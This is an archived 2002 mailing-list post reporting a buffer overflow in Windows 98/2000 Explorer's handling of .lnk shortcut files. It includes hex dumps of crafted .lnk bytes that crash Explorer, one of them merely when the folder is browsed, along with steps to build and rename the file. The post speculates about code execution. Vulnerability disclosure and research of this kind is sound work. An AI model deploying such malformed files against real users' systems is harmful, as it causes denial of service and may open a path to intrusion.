Vulnerability Development mailing list archives

Windows .lnk Files


From: "Brett Moore" <brett () softwarecreations co nz>
Date: Wed, 26 Jun 2002 11:40:48 +1200

It seems that the handling of .lnk files has a few problems. I have tested
on both win98 and win2000 sp2 server.

Can anyone test further? Note that the actions taken by these .lnk files have
the possibility of causing damage to a system and should not be tested on an
essential server :-)

-------------------------------------------------------------------
32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20  2    +,RG  New
54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78  Text Document.tx
74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 FF FF  t NEWTEX~3.TXT
FF FF 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
-------------------------------------------------------------------

This causes FF FF to be loaded into a register used to control the length of
data copied. Usually causes an error when right clicking on the file in
explorer. Sometimes it is required to select properties. Errors seen include
unable to read, unable to write. Since we are controlling the length of the
data copied, these errors are self-explanatory.

It would seem that explorer/shell32.dll is copying too much data when reading
the filename? OK, so this causes the read/write errors and halts progress.

But if we substitute valid values such as 01 01 (CC CC), then the buffer
still gets overflowed but we bypass this error and our corrupt values get
further down in the program.

-------------------------------------------------------------------
32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20  2    +,RG  New
54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78  Text Document.tx
74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 CC CC  t NEWTEX~3.TXT¦¦
CC CC 0F 0F-0F 0F 0F 0F-FF F0 F0 F0-F0 F0 F0 F0  ¦¦¤¤¤¤¤¤________
AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA  ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA  ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
-------------------------------------------------------------------

This one does not cause the read/write errors but causes a DoS in explorer
just by browsing to the folder holding the file.

This is more interesting, but involves tracking a lot of assembler code.
Worst result would be some sort of code executed just by browsing a folder.
Virus related perhaps.

Any feedback on results or further research into this problem would be
appreciated.

Notes:
        Do not save to your desktop.
        Rename the file to .lnk
        This is the win98 file. You can easily modify a 2000 or other lnk file as detailed above.


Brett Moore

Attachment: atxt~1.txt
Description:
